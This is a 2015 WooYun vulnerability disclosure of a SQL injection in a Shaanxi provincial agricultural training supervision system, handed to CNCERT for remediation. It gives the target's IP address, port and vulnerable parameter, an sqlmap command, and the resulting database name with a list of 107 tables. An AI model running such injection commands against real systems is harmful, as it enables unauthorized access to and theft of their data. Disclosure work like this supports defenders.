漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0108506
漏洞标题:陕西省农业科教监管系统SQL注入一例 大量信息泄漏
相关厂商:陕西农业
漏洞作者: 路人甲
提交时间:2015-04-21 19:21
修复时间:2015-06-08 15:38
公开时间:2015-06-08 15:38
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-21: 细节已通知厂商并且等待厂商处理中
2015-04-24: 厂商已经确认,细节仅向厂商公开
2015-05-04: 细节向核心白帽子及相关领域专家公开
2015-05-14: 细节向普通白帽子公开
2015-05-24: 细节向实习白帽子公开
2015-06-08: 细节向公众公开
简要描述:
陕西省农业科教监管系统SQL注入一例 大量信息泄漏
详细说明:
漏洞证明:
注入点:
sqlmap -u "http://1.85.55.38:8080/i_cxxx.jsp?dqdm=" --technique e --current-db
Database: nypxgl
[107 tables]
+------------------------+
| dqxx |
| ktsksjjl |
| mail |
| nbwj |
| njjdjssxtmx |
| njjdjsxx |
| njjgbmxx |
| njjgscxx |
| njkcxx |
| njpxjdxx |
| njpxjy |
| njpxyj |
| njssjgxx |
| njybjscxx |
| njybjxx |
| njybjxxmx |
| njybjxyxx |
| njyjsxx |
| njysgz |
| nmbjxx |
| nmbjxxmx |
| nmjgbmxx |
| nmjgscxx |
| nmjsxx |
| nmkcxx |
| nmpxjdxx |
| nmpxjy |
| nmpxkbsq |
| nmpxyj |
| nmsksjjl |
| nmssjgxx |
| nmxyxx |
| pxjdxx |
| pxjy |
| pxyj |
| pydxdr |
| sbwj |
| scjyzynmjbqkdcb |
| shfwxzynmjbqkdcb |
| sixx |
| sjxx |
| ssjgxx |
| sysflow_flowdefinestat |
| sysflow_flowdefinetab |
| sysflow_flowdefineuser |
| sysqx_jsrk |
| sysqx_qybm |
| sysqx_qygw |
| sysqx_qyrk |
| sysqx_qyxx |
| sysqx_qyyg |
| sysqx_qyzl |
| sysqx_xtjs |
| sysqx_xtrk |
| sysqx_xtyh |
| sysqx_yhjs |
| sysuse_backuptables |
| sysuse_collevel |
| sysuse_configtxt |
| sysuse_dboperatelog |
| sysuse_dbsjjhdy |
| sysuse_fixtemplate |
| sysuse_getdataview |
| sysuse_gjdq |
| sysuse_list |
| sysuse_listcode |
| sysuse_pagefunction |
| sysuse_quick |
| sysuse_recbatedit |
| sysuse_tjstbxx |
| sysuse_tjstlxx |
| sysuse_tjwhbcol |
| sysuse_tjwhbrow |
| xixx |
| xjxx |
| xsdxzynmjbqkdcb |
| xxfb |
| xyshdr |
| xyxx |
| xyxxzgsh |
| xyxxzgshmx |
| xyzgshdr |
| ycjxzx |
| ygda |
| ygjgscxx |
| ygpxbjscxx |
| ygpxbjxx |
| ygpxbjxxmx |
| ygpxbjxyxx |
| ygpxjdjsxx |
| ygpxjdxx |
| ygpxjssxtmx |
| ygpxjy |
| ygpxyj |
| yxxdr |
| zyjnnmjbqkdcb |
| zynmbjscxx |
| zynmbjxx |
| zynmbjxxmx |
| zynmbjxyxx |
| zynmgg |
| zynmjdjsxx |
| zynmjssxtmx |
| zynmpxjdxx |
| zynmxyjbrd |
| zynmzzqkdjb |
| zzcxx |
+------------------------+
修复方案:
修改代码
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-04-24 15:37
厂商回复:
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给陕西分中心,由陕西分中心后续协调网站管理单位处置。
最新状态:
暂无